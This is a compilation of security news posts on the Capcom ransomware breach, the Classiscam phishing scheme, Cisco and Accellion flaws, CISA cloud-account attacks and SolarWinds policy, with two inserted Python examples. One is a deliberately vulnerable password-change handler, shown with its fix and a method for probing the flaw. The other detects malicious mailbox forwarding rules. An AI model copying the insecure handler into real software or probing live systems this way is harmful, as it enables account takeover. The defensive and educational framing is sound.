At the time, the Notice Regarding Network Issues published by the company revealed that on the morning of November 2nd, 2020 it had suffered a cyberattack. In response to the incident, the game developer shut down portions of its corporate network to prevent the malware from spreading.

The incident did not impact connections for its players, and the company initially declared that it had not found any evidence that customer data was stolen.

In mid-November, the company confirmed that the attackers had accessed the personal information of its employees, along with financial and business information. The company believes that other potentially accessed information includes sales reports, financial information, game development documents, and other information related to business partners.

No credit card information was compromised in the security breach.

After the attack, the Ragnar Locker ransomware operators claimed to have stolen over 1TB of data from the company.

In an update published on its leak site, the Ragnar Locker gang leaked a collection of archives as proof of the hack.

“Greetings! Unfortunately even such worldwide leading company as CAPCOM doesn’t values much privacy and security. They was notified about vulnerability and data leak numerous time. They checked our page with proofs but even this didn’t help them to make a right decision and save data from leakage. Also we would help them to decrypt and also provide with recommendations on security measures improvement, to avoid such issues in future.” reads the post published by the gang on its leak site.

“We are sure that everyone should know about CAPCOM’s decision and careless attitude regarding data privacy. This might seems crazy in 21st century, all corporates should work harder on their security measures, especially IT and online based companies.”


This week, Capcom provided an update on its investigation, revealing that the incident was worse than initially thought because the number of impacted people is larger than initially believed.

Capcom revealed that the personal information of 16,406 people has been verified as stolen by the ransomware gang: 3,248 business partners, 9,164 former employees and related parties, and 3,994 employees and related parties. Together with the 9 people confirmed in the November update, the cumulative total of verified victims is 16,415.

“Further, because the overall number of potentially compromised data cannot specifically be ascertained due to issues including some logs having been lost as a result of the attack, Capcom has listed the maximum number of items it has determined to potentially have been affected at the present time.” reads the update published by the company.

Cumulative maximum number of potentially impacted people is 390,000, an increase of approximately 40,000 people from the previous report.

1. Information verified to have been compromised (updated)

i. Personal Information: 16,406 people (cumulative total since investigation began: 16,415 people)
  • Business partners, etc.: 3,248 people. At least one of the following: name, address, phone number, email address, etc.
  • Former employees and related parties: 9,164 people. At least one of the following: name, email address, HR information, etc.
  • Employees and related parties: 3,994 people. At least one of the following: name, email address, HR information, etc.

ii. Other Information: Sales reports, financial information, game development documents, other information related to business partners

2. Potentially compromised data (updated)

i. Personal Information
  • Applicants: approx. 58,000 people. At least one of the following: name, address, phone number, email address, etc.

*Cumulative maximum number of potentially compromised data for customers, business partners and other external parties: 390,000 people

*Regarding the cumulative maximum number of potentially compromised data above: as part of its ongoing investigation, Capcom has determined that it currently does not see evidence for the possibility of data compromise for the approximate 18,000 items of personal information from North America (Capcom Store member information and esports operations website members) that the company included in its November 16, 2020 announcement. As such, these have been removed from this cumulative maximum number of potentially compromised data.

The company pointed out that the investigation is still ongoing and that new facts may come to light.

“At this point in time, Capcom’s internal systems have in large part recovered, and business operations have returned to normal.” concludes the update.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, CAPCOM)

The post CAPCOM: 390,000 people impacted in the recent ransomware Attack appeared first on Security Affairs.

Classiscam expands to Europe: Russian-speaking scammers lure Europeans to pages mimicking classifieds

Russian-speaking scammers have started targeting users of European marketplaces and classifieds in a criminal scheme dubbed Classiscam.

Group-IB, a global threat hunting and adversary-centric cyber intelligence company, has discovered that Russian-speaking scammers have started targeting users of European marketplaces and classifieds. The scheme, dubbed Classiscam by Group-IB, is an automated scam-as-a-service designed to steal money and payment data. It uses Telegram bots that provide scammers with ready-to-use pages mimicking popular classifieds, marketplaces and, sometimes, delivery services. According to Group-IB, over 20 large groups leveraging the scheme currently operate in Bulgaria, the Czech Republic, France, Poland, Romania, the US, and post-Soviet countries, while 20 more groups work in Russia. These 40 groups altogether made at least USD 6.5 mln in 2020. Scammers are actively abusing the brands of popular international classifieds and marketplaces, such as Leboncoin, Allegro, OLX, FAN Courier, and Sbazar. Group-IB has sent notifications to the affected brands so they could take the necessary steps to protect against Classiscam.


The scheme, which initially exploited delivery brands, has been tried and tested in Russia. Analysts warn that it is now growing rapidly and reaching users of European classifieds and marketplaces, which were chosen as a target by Russian-speaking scammers to increase their profits and reduce the risk of being caught. Fighting the scam requires joint efforts by classifieds, marketplaces, and delivery services. It is also key to use advanced digital risk protection technology to ensure that any brand impersonating attacks are quickly detected and taken down. 

Exporting Classiscam

Group-IB Computer Emergency Response Team (CERT-GIB) for the first time recorded the Classiscam in Russia in the summer of 2019. Peak activity was recorded in the spring of 2020 due to the massive switch to remote working and an increase in online shopping.

“In the summer of 2020 we took down 280 scam pages as part of the Classiscam scheme, and by December that number grew 10-fold and reached up to 3,000 pages,” says Yaroslav Kargalev, the deputy head of CERT-GIB. “We see that Classiscammers are now actively migrating from Russia to Europe and other countries. It’s not the first time when Russia serves as a testing ground for cybercriminals with global ambitions.” 

Group-IB’s Digital Risk Protection and CERT-GIB experts have so far identified at least 40 active Classiscam gangs that use scam pages mimicking popular classifieds, marketplace, and delivery companies, each of them running a separate Telegram bot. Half of the groups already operate outside of Russia. Although scammers are only making their first attempts in Europe, an average theft already costs users about USD 120. The scam has been localized for the markets of Eastern and Western Europe. The brands abused by scammers include the French marketplace Leboncoin, the Polish brand Allegro, the Czech site Sbazar, the Romanian courier FAN Courier, DHL and many others. An analysis of underground forums and chats revealed that scammers are getting ready to abuse new brands in their scams: FedEx and DHL Express in the US and Bulgaria.

As part of the scheme, scammers publish bait ads on popular marketplaces and classified websites. The ads usually offer cameras, game consoles, laptops, smartphones, and similar items for sale at deliberately low prices. The buyer contacts the seller, who lures the former into continuing the talk through a third party messenger, such as  WhatsApp. It’s noteworthy that scammers pose as both buyers and sellers. To be more persuasive, the scammers use local phone numbers when speaking with their victims. Such services are offered in the underground. 


Although many marketplaces and classifieds that sell new and used goods have an active policy of protecting users from fraudsters by posting warnings on their resources, victims continue to give away their data. 

The scammers ask victims to provide their contact information, allegedly to arrange a delivery. The scammer then sends the buyer a URL to either a fake website of a popular courier service or a scam website mimicking a classified or a marketplace with a payment form. As a result, the fraudster obtains payment data or withdraws money through a fake merchant website. Another scenario involves a scammer contacting a legitimate seller under the guise of a customer and sending a fake payment form, mimicking the marketplace and obtained via the Telegram bot, so that the seller can supposedly receive the money from the scammer.


Classiscam Hierarchy 

Group-IB discovered at least 40 groups leveraging Classiscam, with each of them running a separate Telegram chat-bot. At least 20 of these groups focus on European countries. On average, they make around US $61,000 monthly, but profits may differ from group to group. It is estimated that all 40 most active criminal groups make US $522,000 per month in total. 

The hierarchy of the scammer groups represents a pyramid, with the topic starters on top. They are responsible for recruiting new members, creating scam pages, registering new accounts, and providing assistance when the bank blocks the recipient’s card or the transaction. The topic starters’ share is about 20-30 percent of the stolen sum. “Workers” get 70-80 percent of the stolen sum for communicating with victims and sending them phishing URLs. 


All details of deals made by workers (including the sum, payment number and username) are displayed in a Telegram bot. That is how Group-IB experts were able to calculate their estimated monthly haul.

Based on payment statistics, the most successful workers move to the top of the list and become influential members of the project. By doing so, they gain access to VIP options in the chats and can work on European marketplaces, which offer a higher income and involve fewer risks for Russian-speaking scammers. Workers’ assistants are called “callers” and “refunders.” They pretend to be tech support specialists and receive 5-10 percent of the revenue.

Phishing kit in Telegram

The scheme is simple and straightforward, which makes it all the more popular. There are more reasons behind its growing popularity, however, such as automated management and expansion through special Telegram chat bots. More than 5,000 users (scammers) were registered in 40 most popular Telegram chats by the end of 2020.  

As it stands, workers just need to send a link with the bait product to the chatbot, which then generates a complete phishing kit including courier URL, payment, and refund. There are more than 10 types of Telegram bots that create scam pages for brands from Bulgaria, the Czech Republic, France, Poland, and Romania. For each brand and country, scammers write scripts that help newbie workers log in to foreign sites and communicate with victims in the local language.

Chatbots also have shops where you can purchase accounts to various marketplaces, e-wallets, targeted mailings, and manuals, or even hire a lawyer to represent you in court.  

“So far, the scam’s expansion in Europe is hindered by language barriers and difficulties with cashing out stolen money abroad,” says Dmitriy Tiunkin, Head of Group-IB Digital Risk Protection Department, Europe. “Once the scammers overcome these barriers, Classiscam will spread in the West. The downside of popularity is competition among scammers, who sometimes frame each other without knowing it.”

Fighting the Classiscam

In order to protect their brands from Classiscam, companies need to go beyond the simple monitoring and blocking approach. Instead, it is necessary to identify and block adversary infrastructure using AI-driven digital risk protection systems enriched with data about adversary infrastructure, techniques, tactics, and new fraud schemes. 


The recommendations for users are quite simple and include: 

·     Trust only official websites. Before entering your login details and payment information, double-check the URL and look up when the domain was registered (for example, with a WHOIS lookup). If the site is only a couple of months old, it is highly likely to be a scam or a phishing page.

·      When using services for renting or selling new and used goods, do not switch to messengers. Keep all your communication in the official chat.

·      Do not order goods or agree to deals involving a prepaid transaction. Pay only after you receive the goods and make sure that everything is working properly.

·      Large discounts and unbelievable promotions may be just that: too good to be true. They are likely to indicate a bait product and a phishing page. Be careful.

About the author: Group-IB

Group-IB is a Singapore-based provider of solutions aimed at detection and prevention of cyberattacks and online fraud. The company also specializes in high-profile cyber investigations and IP protection services. 

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Classiscam)

The post Classiscam expands to Europe: Russian-speaking scammers lure Europeans to pages mimicking classifieds appeared first on Security Affairs.

Cisco addresses a High-severity flaw in CMX Software

Cisco addressed dozens of high-severity flaws, including some in the AnyConnect Secure Mobility Client and in its small business routers.

This week Cisco released security updates to address 67 high-severity vulnerabilities, including issues affecting Cisco’s AnyConnect Secure Mobility Client and its small business routers (Cisco RV110W, RV130, RV130W, and RV215W).

One of the flaws fixed by the tech giant, tracked as CVE-2021-1144, is a high-severity vulnerability in Cisco Connected Mobile Experiences (CMX), a Wi-Fi location platform that uses Cisco wireless infrastructure to provide location services and location analytics for visitors’ mobile devices. CMX lets an organization deliver content to smartphones and tablets that is personalized to visitors’ preferences and tied to their real-time indoor location.

The vulnerability, which received a CVSS score of 8.8 out of 10, could be exploited by a remote authenticated attacker to change the password for any account user on affected systems.

“A vulnerability in Cisco Connected Mobile Experiences (CMX) could allow a remote, authenticated attacker without administrative privileges to alter the password of any user on an affected system.” reads the advisory published by Cisco.

“The vulnerability is due to incorrect handling of authorization checks for changing a password. An authenticated attacker without administrative privileges could exploit this vulnerability by sending a modified HTTP request to an affected device. A successful exploit could allow the attacker to alter the passwords of any user on the system, including an administrative user, and then impersonate that user.”

The flaw affects Cisco CMX releases 10.6.0, 10.6.1, and 10.6.2.

The vendor addressed the flaw with the release of software version 10.6.3; it also informed customers that there are no workarounds that address this issue.
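The advisory describes a classic authorization bug: the request is authenticated, but the server trusts the target username in the request body and never checks whether the caller may act on that account. The following Python is an added example of that pattern beside its fix; it is not CMX code (which is not public) and does not reproduce CMX's request format. The user store, roles, hashing parameters and request shape are all constructed.

```python
"""Password change with and without an authorization check on the target
user, the bug class described for CVE-2021-1144 (added example; the users,
roles and request shape below are constructed)."""
import hashlib
import hmac
import secrets

PBKDF2_ROUNDS = 100_000  # assumption: illustrative KDF setting, not CMX's


class AuthzError(Exception):
    """Raised when the caller may not perform the requested change."""


def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def _credential(password):
    salt = secrets.token_bytes(16)
    return {"salt": salt, "hash": _hash(password, salt)}


def make_users():
    """Constructed user store: one administrator and two ordinary users."""
    return {
        "admin": {"role": "admin", **_credential("admin-pass")},
        "alice": {"role": "user", **_credential("alice-pass")},
        "bob": {"role": "user", **_credential("bob-pass")},
    }


def verify_password(users, username, password):
    record = users[username]
    return hmac.compare_digest(_hash(password, record["salt"]), record["hash"])


def change_password_vulnerable(users, session_user, body):
    """The caller is authenticated (session_user), but the account to modify is
    taken from the request body and never compared with the session, so any
    logged-in user can set the password of any account, including 'admin'."""
    target = body["username"]
    users[target].update(_credential(body["new_password"]))
    return target


def change_password_fixed(users, session_user, body):
    """Authorization is decided from the server-side session, not the body."""
    target = body["username"]
    caller_role = users[session_user]["role"]
    if target not in users:
        raise AuthzError("request denied")  # same message as a denial, to avoid user enumeration
    if target != session_user and caller_role != "admin":
        raise AuthzError("request denied")  # only administrators may change other users' passwords
    if target == session_user and not verify_password(users, session_user, body.get("current_password", "")):
        raise AuthzError("request denied")  # self-service change must prove the current password
    users[target].update(_credential(body["new_password"]))
    return target


if __name__ == "__main__":
    users = make_users()
    # 'alice' (a normal user) resets 'admin' through the vulnerable handler.
    change_password_vulnerable(users, "alice", {"username": "admin", "new_password": "pwned"})
    print("admin password now 'pwned':", verify_password(users, "admin", "pwned"))
    try:
        change_password_fixed(users, "alice", {"username": "admin", "new_password": "pwned-again"})
    except AuthzError as exc:
        print("fixed handler:", exc)
```

The test for this bug class is the same on any product: take a low-privileged session, replay the password-change request with another account's identifier in the body, and check whether the server enforces the relationship between session and target. Note that the fix keys every decision off `session_user`, which the server derived from the authenticated session, and treats the body's `username` purely as untrusted input.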

Cisco also addressed a DLL Injection flaw, tracked as CVE-2021-1237, in Cisco AnyConnect Secure Mobility Client for Windows.

The flaw received a CVSS score of 7.8, attackers could exploit it to conduct a dynamic-link library (DLL) injection attack.

“A vulnerability in the Network Access Manager and Web Security Agent components of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to perform a DLL injection attack. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system.” reads the advisory.

“The vulnerability is due to insufficient validation of resources that are loaded by the application at run time. An attacker could exploit this vulnerability by inserting a configuration file in a specific path in the system which, in turn, causes a malicious DLL file to be loaded when the application starts. A successful exploit could allow the attacker to execute arbitrary code on the affected machine with SYSTEM privileges.”

Cisco also fixed a series of flaws in the management interface of the Small Business RV110W, RV130, RV130W, and RV215W routers that could lead to remote command execution and denial of service.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, CMX)

The post Cisco addresses a High-severity flaw in CMX Software appeared first on Security Affairs.

CISA warns of recent successful cyberattacks against cloud service accounts

US CISA revealed that several recent cyberattacks successfully compromised various organizations’ cloud services.

The Cybersecurity and Infrastructure Security Agency (CISA) announced that several recent successful cyberattacks hit various organizations’ cloud services.

According to the agency, the attackers conducted phishing campaigns and exploited poor cyber hygiene practices of the victims in the management of cloud services configuration.

CISA published an Analysis Report based on information collected exclusively from several CISA incident response engagements; this data is valuable because it details the tactics, techniques, and procedures (TTPs) used by the threat actors and the indicators of compromise (IOCs). The data in the Analysis Report is not explicitly tied to the supply chain attack on the SolarWinds Orion Platform software.

“The cyber threat actors involved in these attacks used a variety of tactics and techniques—including phishing, brute force login attempts, and possibly a “pass-the-cookie” attack—to attempt to exploit weaknesses in the victim organizations’ cloud security practices.” reads the report published by CISA.

CISA reported that the threat actors were able to access cloud service accounts protected by multi-factor authentication (MFA).

The attackers may have used stolen browser session cookies to defeat MFA in a “pass-the-cookie” attack (MITRE ATT&CK T1550.004).

Government experts confirmed that the threat actors first attempted brute-force logins on some accounts, without success.

In at least one case, the attackers modified or set up email forwarding rules to redirect messages to an account under their control.

Threat actors also modified existing rules to search users’ email messages (subject and body) for keywords that could allow them to identify messages containing sensitive data (e.g. financial information) and forward them to their accounts.

“In addition to modifying existing user email rules, the threat actors created new mailbox rules that forwarded certain messages received by the users (specifically, messages with certain phishing-related keywords) to the legitimate users’ Really Simple Syndication (RSS) Feeds or RSS Subscriptions folder in an effort to prevent warnings from being seen by the legitimate users,” continues CISA.
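One way to hunt for the mailbox-rule tradecraft described above, as an added example that is not CISA’s or any vendor’s code: it assumes hypothetical audit records shaped like Exchange inbox-rule cmdlet parameters (ForwardTo, MoveToFolder, SubjectContainsWords), a tenant domain of example.org, and a keyword list, all constructed here.

```python
"""Flag inbox-rule changes matching the tradecraft in the CISA report.

Added example, not CISA's or any vendor's code. Events are hypothetical
audit records modelled on Exchange inbox-rule cmdlet parameters
(New-InboxRule / Set-InboxRule); the record layout, the tenant domain
and the keyword list are assumptions made for this example.
"""
from __future__ import annotations

from dataclasses import dataclass, field

# Assumption: the organization's own mail domains; anything else is external.
INTERNAL_DOMAINS = {"example.org"}

# Folders the report says attackers used to hide security warnings from users.
HIDING_FOLDERS = {"rss feeds", "rss subscriptions"}

# Rule parameters that send a copy of (or redirect) mail elsewhere.
FORWARD_PARAMS = ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo")

# Keyword filters typical of data-harvesting or warning-suppression rules
# (constructed list; tune to the environment).
SUSPICIOUS_KEYWORDS = {
    "invoice", "payment", "wire", "bank", "password",
    "phishing", "suspicious", "hacked", "security alert",
}


@dataclass
class Finding:
    user: str
    rule: str
    reasons: list[str] = field(default_factory=list)


def _as_list(value) -> list[str]:
    """Audit logs record single values as strings and multiples as lists."""
    if value is None:
        return []
    return [value] if isinstance(value, str) else list(value)


def _external_addresses(addresses: list[str]) -> list[str]:
    """Return the recipients whose domain is not one of ours."""
    external = []
    for addr in addresses:
        domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
        if domain and domain not in INTERNAL_DOMAINS:
            external.append(addr)
    return external


def analyse_event(event: dict) -> Finding | None:
    """Return a Finding if one audit record looks like the reported tradecraft."""
    if event.get("Operation") not in ("New-InboxRule", "Set-InboxRule"):
        return None
    params = event.get("Parameters", {})
    finding = Finding(user=event.get("UserId", "?"), rule=params.get("Name", "?"))

    # 1. Auto-forwarding to an address outside the tenant.
    for p in FORWARD_PARAMS:
        ext = _external_addresses(_as_list(params.get(p)))
        if ext:
            finding.reasons.append(f"{p} to external address(es) {', '.join(ext)}")

    # 2. Moving mail into the RSS folders, where users will not see it.
    folder = str(params.get("MoveToFolder", ""))
    if folder.lower() in HIDING_FOLDERS:
        finding.reasons.append(f"moves matching mail into '{folder}' (warning suppression)")

    # 3. Keyword filters only matter together with 1, 2 or deletion;
    #    a rule filing 'invoice' mail into an Invoices folder is normal.
    words = set()
    for p in ("SubjectContainsWords", "BodyContainsWords", "SubjectOrBodyContainsWords"):
        words.update(w.lower() for w in _as_list(params.get(p)))
    hits = sorted(words & SUSPICIOUS_KEYWORDS)
    if hits and (finding.reasons or params.get("DeleteMessage")):
        suffix = " with DeleteMessage" if params.get("DeleteMessage") else ""
        finding.reasons.append(f"keyword filter on {hits}{suffix}")

    return finding if finding.reasons else None


def analyse_events(events: list[dict]) -> list[Finding]:
    """Run analyse_event over a batch and keep only the hits."""
    return [f for f in (analyse_event(e) for e in events) if f is not None]


# Constructed sample records, not real log data.
SAMPLE_EVENTS = [
    {"UserId": "alice@example.org", "Operation": "New-InboxRule",
     "Parameters": {"Name": "sync", "ForwardTo": ["archive@mail-relay.test"],
                    "SubjectContainsWords": ["invoice", "payment"]}},
    {"UserId": "bob@example.org", "Operation": "Set-InboxRule",
     "Parameters": {"Name": "cleanup", "MoveToFolder": "RSS Subscriptions",
                    "SubjectOrBodyContainsWords": ["phishing", "suspicious"]}},
    {"UserId": "carol@example.org", "Operation": "New-InboxRule",
     "Parameters": {"Name": "team", "ForwardTo": "team@example.org",
                    "MoveToFolder": "Projects", "SubjectContainsWords": "invoice"}},
    {"UserId": "dave@example.org", "Operation": "MailItemsAccessed", "Parameters": {}},
]

if __name__ == "__main__":
    for f in analyse_events(SAMPLE_EVENTS):
        print(f"{f.user} rule '{f.rule}': " + "; ".join(f.reasons))
```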

The FBI also warned US organizations about scammers abusing auto-forwarding rules on web-based email clients in Business Email Compromise (BEC) attacks.

Last week, the Cybersecurity and Infrastructure Security Agency (CISA) revealed that threat actors behind the SolarWinds supply chain attack also employed common hacker techniques to compromise the networks of the targeted organizations, including password guessing and password spraying.

CISA also added that inappropriately secured administrative credentials accessible via external remote access services were abused by the attackers.

CISA added that it is investigating incidents in which threat actors abused the Security Assertion Markup Language (SAML) tokens.


Pierluigi Paganini

(SecurityAffairs – hacking, Golang-based worm)

The post CISA warns of recent successful cyberattacks against cloud service accounts appeared first on Security Affairs.

Attackers targeted Accellion FTA in New Zealand Central Bank attack

The root cause for the hack of the New Zealand Central Bank was the Accellion FTA (File Transfer Application) file sharing service.

During the weekend, the New Zealand central bank announced that a cyber attack hit its infrastructure. According to the government organization, one of its data systems was breached by an unidentified hacker, and commercially and personally sensitive information might have been accessed by the attackers.

According to Governor Adrian Orr, the attack did not impact the bank’s core operations; he added that the security breach has been contained. In response to the incident, the affected system was taken offline.

“We are actively working with domestic and international cyber security experts and other relevant authorities as part of our investigation. This includes the GCSB’s National Cyber Security Centre which has been notified and is providing guidance and advice,” the bank’s governor, Adrian Orr, said.

“We have been advised by the third party provider that this wasn’t a specific attack on the Reserve Bank, and other users of the file sharing application were also compromised.” “We recognise the public interest in this incident however we are not in a position to provide further details at this time.”

National authorities immediately launched an investigation into the incident with the help of cybersecurity experts.

According to the bank, threat actors compromised a service that stored commercially and personally sensitive information.

Early this week, the Reserve Bank of New Zealand confirmed that it uses Accellion FTA service to share information with external stakeholders.

“The Reserve Bank of New Zealand – Te Pūtea Matua continues to respond with urgency to a breach of a third party file sharing service used to share information with external stakeholders.” reads the press release published by the Reserve Bank.

The bank confirmed that a third party file sharing service provided by Accellion called FTA (File Transfer Application), which it was using, was illegally accessed in mid-December.

The bank is not providing additional information on the intrusion to avoid affecting the investigation.

According to Accellion, fewer than 50 customers were affected by the flaw.

“In mid-December, Accellion was made aware of a P0 vulnerability in its legacy File Transfer Appliance (FTA) software. Accellion FTA is a 20 year old product that specializes in large file transfers.” reads the advisory published by the company. “Accellion resolved the vulnerability and released a patch within 72 hours to the less than 50 customers affected.”

Accellion pointed out that its enterprise content firewall platform, kiteworks, was not involved in any way.

“While Accellion maintains tight security standards for its legacy FTA product, we strongly encourage our customers to update to kiteworks, the modern enterprise content firewall platform, for the highest level of security and confidence,” concludes the US-based vendor.


Pierluigi Paganini

(SecurityAffairs – hacking, New Zealand)

The post Attackers targeted Accellion FTA in New Zealand Central Bank attack appeared first on Security Affairs.

Global cyber-espionage campaign linked to Russian spying tools

Kaspersky investigators uncover evidence that may support US claims Moscow was behind attack

A Moscow-based cybersecurity company has reported that some of the malicious code employed against the US government in a cyber-attack last month overlaps with code previously used by suspected Russian hackers.

The findings by Kaspersky investigators may provide the first public evidence to support accusations from Washington that Moscow was behind the biggest cyber-raid against the government in years, affecting 18,000 users of software produced by SolarWinds, including US government agencies.


APT Horoscope

This delightful essay matches APT hacker groups up with astrological signs. This is me:

Capricorn is renowned for its discipline, skilled navigation, and steadfastness. Just like Capricorn, Helix Kitten (also known as APT 35 or OilRig) is a skilled navigator of vast online networks, maneuvering deftly across an array of organizations, including those in aerospace, energy, finance, government, hospitality, and telecommunications. Steadfast in its work and objectives, Helix Kitten has a consistent track record of developing meticulous spear-phishing attacks.

Russia’s SolarWinds Attack and Software Security

The information that is emerging about Russia’s extensive cyberintelligence operation against the United States and other countries should be increasingly alarming to the public. The magnitude of the hacking, now believed to have affected more than 250 federal agencies and businesses — primarily through a malicious update of the SolarWinds network management software — may have slipped under most people’s radar during the holiday season, but its implications are stunning.

According to a Washington Post report, this is a massive intelligence coup by Russia’s foreign intelligence service (SVR). And a massive security failure on the part of the United States is also to blame. Our insecure Internet infrastructure has become a critical national security risk — one that we need to take seriously and spend money to reduce.

President-elect Joe Biden’s initial response spoke of retaliation, but there really isn’t much the United States can do beyond what it already does. Cyberespionage is business as usual among countries and governments, and the United States is aggressively offensive in this regard. We benefit from the lack of norms in this area and are unlikely to push back too hard because we don’t want to limit our own offensive actions.

Biden took a more realistic tone last week when he spoke of the need to improve US defenses. The initial focus will likely be on how to clean the hackers out of our networks, why the National Security Agency and US Cyber Command failed to detect this intrusion and whether the 2-year-old Cybersecurity and Infrastructure Security Agency has the resources necessary to defend the United States against attacks of this caliber. These are important discussions to have, but we also need to address the economic incentives that led to SolarWinds being breached and how that insecure software ended up in so many critical US government networks.

Software has become incredibly complicated. Most of us don’t know all of the software running on our laptops and what it’s doing. We don’t know where it’s connecting to on the Internet — not even which countries it’s connecting to — and what data it’s sending. We typically don’t know what third-party libraries are in the software we install. We don’t know what software any of our cloud services are running. And we’re rarely alone in our ignorance. Finding all of this out is incredibly difficult.

This is even more true for software that runs our large government networks, or even the Internet backbone. Government software comes from large companies, small suppliers, open source projects and everything in between. Obscure software packages can have hidden vulnerabilities that affect the security of these networks, and sometimes the entire Internet. Russia’s SVR leveraged one of those vulnerabilities when it gained access to SolarWinds’ update server, tricking thousands of customers into downloading a malicious software update that gave the Russians access to those networks.

The fundamental problem is one of economic incentives. The market rewards quick development of products. It rewards new features. It rewards spying on customers and users: collecting and selling individual data. The market does not reward security, safety or transparency. It doesn’t reward reliability past a bare minimum, and it doesn’t reward resilience at all.

This is what happened at SolarWinds. A New York Times report noted the company ignored basic security practices. It moved software development to Eastern Europe, where Russia has more influence and could potentially subvert programmers, because it’s cheaper.

Short-term profit was seemingly prioritized over product security.

Companies have the right to make decisions like this. The real question is why the US government bought such shoddy software for its critical networks. This is a problem that Biden can fix, and he needs to do so immediately.

The United States needs to improve government software procurement. Software is now critical to national security. Any system for acquiring software needs to evaluate the security of the software and the security practices of the company, in detail, to ensure they are sufficient to meet the security needs of the network they’re being installed in. Procurement contracts need to include security controls of the software development process. They need security attestations on the part of the vendors, with substantial penalties for misrepresentation or failure to comply. The government needs detailed best practices for government and other companies.

Some of the groundwork for an approach like this has already been laid by the federal government, which has sponsored the development of a “Software Bill of Materials” that would set out a process for software makers to identify the components used to assemble their software.

This scrutiny can’t end with purchase. These security requirements need to be monitored throughout the software’s life cycle, along with what software is being used in government networks.

None of this is cheap, and we should be prepared to pay substantially more for secure software. But there’s a benefit to these practices. If the government evaluations are public, along with the list of companies that meet them, all network buyers can benefit from them. The US government acting purely in the realm of procurement can improve the security of nongovernmental networks worldwide.

This is important, but it isn’t enough. We need to set minimum safety and security standards for all software: from the code in that Internet of Things appliance you just bought to the code running our critical national infrastructure. It’s all one network, and a vulnerability in your refrigerator’s software can be used to attack the national power grid.

The IOT Cybersecurity Improvement Act, signed into law last month, is a start in this direction.

The Biden administration should prioritize minimum security standards for all software sold in the United States, not just to the government but to everyone. Long gone are the days when we can let the software industry decide how much emphasis to place on security. Software security is now a matter of personal safety: whether it’s ensuring your car isn’t hacked over the Internet or that the national power grid isn’t hacked by the Russians.

This regulation is the only way to force companies to provide safety and security features for customers — just as legislation was necessary to mandate food safety measures and require auto manufacturers to install life-saving features such as seat belts and air bags. Smart regulations that incentivize innovation create a market for security features. And they improve security for everyone.

It’s true that creating software in this sort of regulatory environment is more expensive. But if we truly value our personal and national security, we need to be prepared to pay for it.

The truth is that we’re already paying for it. Today, software companies increase their profits by secretly pushing risk onto their customers. We pay the cost of insecure personal computers, just as the government is now paying the cost to clean up after the SolarWinds hack. Fixing this requires both transparency and regulation. And while the industry will resist both, they are essential for national security in our increasingly computer-dependent worlds.

This essay previously appeared on

Fact vs. Fiction: Film Industry’s Portrayal of Cybersecurity

Article by Beau Peters

The movie industry is infamous for its loose depictions of hacking and cybersecurity. Hollywood often gets a lot wrong about hacking and digital protections, but what does it get right?

The power of film in influencing the future of technology and the experts that create it is immense. Because of this, it is important to assess what the facts are versus movie fiction.  Here, we’ll explore the film industry’s portrayal of cybersecurity.

Cybersecurity in Movies
From WarGames to Blackhat, hacking and cybersecurity movies have glamorized the world of digital safety and the compromising of said safety. However, each Hollywood outing does so with varying levels of realism, typically embracing excitement over reality.

In the 1983 WarGames movie, a young hacker almost triggers World War 3.

These portrayals have led to common tropes and views of the cybersecurity industry in their attempts to prevent and combat hacking attempts. Among these tropes are some of the following portrayals, each occurring with varying degrees of absurdity.

1. Hacking is exciting, fast, and often ethical
The trope of a computer-savvy individual slamming on a keyboard for a few seconds and saying “I’m in” is common enough to be a defining joke about cybersecurity in film. Hacking is shown to be a process that takes minutes and has instant results. This is often far from reality, where hacking attempts can take weeks or even months to produce results.

And the results of actual digital break-ins are often far from ethical. Movies tend to show hacking as a victimless crime, but real-life hacking tends to mean data theft that can have severe implications on people’s lives.

2. There is a visually distinct or compelling element of hacking 
Hollywood has to keep an audience engaged. Because of this, hacking and cybersecurity are often paired with some visually striking element that would simply be ridiculous in reality.

Jurassic Park has a great scene exemplifying this trope. Under attack from a velociraptor, a child logs on to a computer and proceeds to navigate through a 3D maze representing the computer system’s files. In reality, typing in a few commands would have achieved a result faster. However, this wouldn’t have been as exciting.

3. Hacking and cybersecurity are defined by excessively fast typing
You always know a hacker or a computer systems expert by their excessively fast keyboard smashing. In movies and TV, computer experts are always clicking away at a keyboard at speeds few of us could match, speeds that would be unlikely to result in very productive work given the mistakes they would cause and the time needed to assess the situation.

However, fast typing is a staple of hacking movies. The faster you type, the faster you can get in or defend a system.

When compared to the reality of cybersecurity systems, these Hollywood portrayals often come up short. Though some movies are getting better at portraying hacking and security, they rarely capture the grittier, less exciting truth. 

Cybersecurity in Reality
In reality, hacking is a much more time-consuming and boring process, with results that have real impacts on the lives of everyday people. Hollywood neglects some of these finer points in favour of spectacle, as can be expected. Cybersecurity comes with its own set of tedious practices as well as the glamorous aspects of navigating computer systems.

Here are just a few ways that hacking and cybersecurity operate in the real world that movies tend to obscure or fail to depict:

1. Hacking is about information more than profit.
While cybercriminals can sometimes come away with a profit, doing so is incredibly difficult and not very common. Ransomware is sometimes used to extort profits from corporations, a process that occurs when a cybercriminal uses malware to hold a system hostage until a payment is made. However, break-ins usually result in little more than data theft or blockages with costly implications for businesses and individuals.

For example, Distributed Denial of Service (DDoS) attacks are used to slow or stop the computer processes of a business. This doesn’t necessarily result in any money for the hackers, but the downtime can cost companies thousands to millions of dollars.

2. Hackers rely heavily on phishing and social engineering.
Breaking into a system often requires access to valid user IDs and account passwords. This means hackers tend to use phishing and social engineering methods to mine information. They use all kinds of bots and scams to try and trick average individuals into clicking a link or divulging personal information.

However, this means that a lot of good can be done in the cybersecurity world without even needing to code. Simply teaching teams what to look for in avoiding scams and fraud can be a great way to approach cybersecurity incident management and keep private data safe.

3. White-hat hackers are real, and they make good money.
